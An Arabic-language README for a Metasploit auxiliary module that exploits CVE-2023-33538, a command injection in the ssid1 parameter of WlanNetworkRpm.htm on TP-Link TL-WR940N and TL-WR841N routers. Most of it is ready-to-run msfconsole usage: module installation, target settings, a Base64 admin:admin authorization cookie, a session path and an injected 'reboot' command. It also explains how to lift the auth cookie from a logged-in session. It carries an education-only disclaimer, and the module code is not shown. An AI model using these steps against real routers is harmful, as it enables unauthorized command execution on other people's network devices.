
CVE-2023-33538 - وحدة Ruby لحقن الأوامر في TP-Link لإطار عمل Metasploit
وحدة مساعد (auxiliary) من Metasploit تستهدف ثغرة حقن أوامر موثقة في أجهزة التوجيه TP-Link TL-WR940N V2/V4 و TL-WR841N V8/V10.
المشكلة تكمن في المعامل الضعيف ssid1 المستخدم في WlanNetworkRpm.htm، والذي يسمح بحقن أوامر شيل عشوائية.
عند النجاح، تتيح للمهاجم تنفيذ أوامر عشوائية على الجهاز.
مزيد من المعلومات حول CVE:
https://nvd.nist.gov/vuln/detail/CVE-2023-33538
.rb إلى مجلد وحدات Metasploit الخاص بك، على سبيل المثال:cp tplink_ssid1_rce.rb/usr/share/metasploit-framework/modules/auxiliary/admin/http/
msfconsole
search tplink
use auxiliary/admin/http/tplink_ssid1_rce
set RHOSTS 192.168.0.1
set RPORT 80
set AUTHCOOKIE Basic%20YWRtaW46YWRtaW4%3D
set SESSIONPATH /ABCD1234/
set CMD reboot
run
الوحدة لا تقوم بالمصادقة. يجب عليك استخراج كعكة
Authorizationوبادئة الجلسة يدويًا من تسجيل دخول ناجح لواجهة الويب الخاصة بجهاز التوجيه.
هذه الوحدة مخصصة للأغراض التعليمية فقط.
لا تستخدم هذا الكود ضد أجهزة أو بنية تحتية لا تملكها أو لديك إذن صريح لاختبارها.
إذا وجدت أخطاء، أو كانت لديك أفكار للتحسين – لا تتردد في فتح مشكلة أو ترك تعليق.